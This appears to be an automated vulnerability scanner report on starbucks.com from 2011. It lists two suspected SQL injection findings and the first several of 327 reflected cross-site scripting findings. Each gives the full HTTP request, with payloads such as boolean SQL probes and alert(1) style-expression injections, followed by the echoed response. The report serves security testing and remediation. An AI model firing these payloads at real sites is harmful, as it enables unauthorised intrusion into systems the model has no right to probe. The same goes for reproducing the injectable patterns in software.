There are 2 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Issue remediation

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /menu/food/salads/fruit-cup

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /menu/food/salads/fruit-cup?1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:53 GMT
Connection: close
Content-Length: 40081

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<div class="allergy">
                           
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>All fruit and vegetables have a season ... a time when they are abundant and taste best. This fruit cup, a delicious combo of seasonal fruit will have you looking forward to each new day on the calendar.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>Like apples? There are more than 7,500 known types of apples.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>pineapple, cantaloupe, kiwi or mango, grapes. ingredients may vary by season.</p>
               </div>
               
           </div>

           <div id="content_rail">
               
               <div id="available">
                   <p>
                       <strong>
                       
                       Currently Available
                       
                       </strong>
                       
                       
                   </p>

                   
                   
                   
               </div
...[SNIP]...

Request 2

GET /menu/food/salads/fruit-cup?1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:59 GMT
Connection: close
Content-Length: 40286

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<div class="allergy">
                           <ul><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-fat">Fat - 10g or less</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-sodium">Sodium - 600mg or less</a></li></ul>
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>All fruit and vegetables have a season ... a time when they are abundant and taste best. This fruit cup, a delicious combo of seasonal fruit will have you looking forward to each new day on the calendar.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>Like apples? There are more than 7,500 known types of apples.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>pineapple, cantaloupe, kiwi or mango, grapes. ingredients may vary by season.</p>
               </div>
               
           </div>


...[SNIP]...

1.2. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.starbucks.com
Path:   /menu/food/salads/picnic-pasta-salad

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 13768680'%20or%201%3d1--%20 and 13768680'%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /menu/food/salads/picnic-pasta-salad?113768680'%20or%201%3d1--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:11 GMT
Connection: close
Content-Length: 41249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</p>
                           <ul><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-fat">Fat - 10g or less</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=high-fiber">Fiber - at least 3g</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=high-protein">Protein - at least 10g</a></li><li><a href="/menu/catalog/nutrition?food=all&amp;wellness=low-sodium">Sodium - 600mg or less</a></li></ul>
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>Summer picnics are more fun with lots of good food to pack the basket. And this light salad is packed with chicken, shredded carrots, grape tomatoes, diced zucchini and bowtie pasta. It's topped with a red wine vinaigrette dressing that won't weigh you down. All you need is a fork and an appetite.</p>


               
               <div id="fun_facts"
...[SNIP]...

Request 2

GET /menu/food/salads/picnic-pasta-salad?113768680'%20or%201%3d2--%20=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:42 GMT
Connection: close
Content-Length: 40841

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
</p>
                           
                       </div>
                       
               

                       <div id="disclaimer">
                           
       <p>Nutrition information is calculated with..data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations.</p>

                           
                           <div class="full">
                               
       <p>Nutrition information is calculated with data provided by the suppliers who manufacture food and beverage items for Starbucks Coffee Company. Variations may exist due to periodic changes in formulations. Serving sizes may vary from those used to calculate nutrition information. We attempt to provide product information that is as complete as possible. Product changes or new product introductions may cause this information to become outdated or incomplete. Data is rounded to meet current U.S. FDA NLEA guidelines. Percentage data for vitamins and minerals refers to percentage of U.S. Daily Values for a 2,000 calorie diet. Products may vary from location to location. Our foods and beverages are produced and stored in environments where known allergens are present.</p>

                           </div>
                       </div>
               </div>
           </div>
       </div>

       <div id="content">
           <div id="content_main">
               
       <p>Summer picnics are more fun with lots of good food to pack the basket. And this light salad is packed with chicken, shredded carrots, grape tomatoes, diced zucchini and bowtie pasta. It's topped with a red wine vinaigrette dressing that won't weigh you down. All you need is a fork and an appetite.</p>


               
               <div id="fun_facts">
                   <h3>Did you know?</h3>
                   <p>The first American pasta factory was opened in Brooklyn, New York, in 1848, by a Frenchman named Antoine Zerega.</p>
               </div>
               
               <div id="ingredients">
                   <h4>Ingredients</h4>
                   <p>picnic pasta salad (water, farfalle pasta [semolina (wheat), durum flour (wheat), niacin, iron (ferrous sulfate), thiamine mononitrate, riboflavin, folic acid], zucchini
...[SNIP]...

2. Cross-site scripting (reflected)
There are 327 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Remediation background

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


2.1. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 95116"%3balert(1)//81dd21ba950 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95116";alert(1)//81dd21ba950 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /?95116"%3balert(1)//81dd21ba950=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:13:59 GMT
Connection: close
Content-Length: 41116

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<script type="text/javascript">
       var flashvars = {};
       flashvars.playerType = "homepage";
       flashvars.playlistID = "69777476001";
       flashvars.playerLocation = "http://www.starbucks.com/?95116";alert(1)//81dd21ba950=1";
       var params = {};
       params.loop = "false";
       params.quality = "best";
       params.scale = "exactfit";
       params.wmode = "transparent";
       params.allowscriptaccess = "always";
       params.allownetw
...[SNIP]...

2.2. http://www.starbucks.com/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9ce4"style="x:expression(alert(1))"c1e3c89638a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /?a9ce4"style%3d"x%3aexpression(alert(1))"c1e3c89638a=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 03:13:55 GMT
Connection: close
Content-Length: 41173

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<a href="http://www.addthis.com/bookmark.php?v=250&amp;username=starbucks&amp;url=http://www.starbucks.com/?a9ce4"style="x:expression(alert(1))"c1e3c89638a=1" class="addthis_button_compact" title="Post to AddThis">
...[SNIP]...

2.3. http://www.starbucks.com/about-us [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9592"style%3d"x%3aexpression(alert(1))"d1e7701208 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a9592"style="x:expression(alert(1))"d1e7701208 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us?a9592"style%3d"x%3aexpression(alert(1))"d1e7701208=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:13:39 GMT
Connection: close
Content-Length: 38564

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us?a9592"style="x:expression(alert(1))"d1e7701208=1" />
...[SNIP]...

2.4. http://www.starbucks.com/about-us/company-information [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48515"style%3d"x%3aexpression(alert(1))"882196566b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 48515"style="x:expression(alert(1))"882196566b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information?48515"style%3d"x%3aexpression(alert(1))"882196566b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:01 GMT
Connection: close
Content-Length: 39249

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information?48515"style="x:expression(alert(1))"882196566b=1" />
...[SNIP]...

2.5. http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/privacy-statement

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 6624b"style="x:expression(alert(1))"6dff94306a9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/privacy-statement?6624b"style%3d"x%3aexpression(alert(1))"6dff94306a9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:44 GMT
Connection: close
Content-Length: 52934

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/privacy-statement?6624b"style="x:expression(alert(1))"6dff94306a9=1" />
...[SNIP]...

2.6. http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/terms-of-use

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 177c1"style="x:expression(alert(1))"405a7c3edc3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/terms-of-use?177c1"style%3d"x%3aexpression(alert(1))"405a7c3edc3=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:21:24 GMT
Connection: close
Content-Length: 68896

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/terms-of-use?177c1"style="x:expression(alert(1))"405a7c3edc3=1" />
...[SNIP]...

2.7. http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/online-policies/web-accessibility

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 30cc8"style="x:expression(alert(1))"6c461a50f50 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/online-policies/web-accessibility?30cc8"style%3d"x%3aexpression(alert(1))"6c461a50f50=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:20:20 GMT
Connection: close
Content-Length: 39352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/about-us/company-information/online-policies/web-accessibility?30cc8"style="x:expression(alert(1))"6c461a50f50=1" />
...[SNIP]...

2.8. http://www.starbucks.com/about-us/company-information/product-advisories [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /about-us/company-information/product-advisories

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4cd5c"style="x:expression(alert(1))"3d37d7257db in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression in a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /about-us/company-information/product-advisories?4cd5c"style%3d"x%3aexpression(alert(1))"3d37d7257db=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
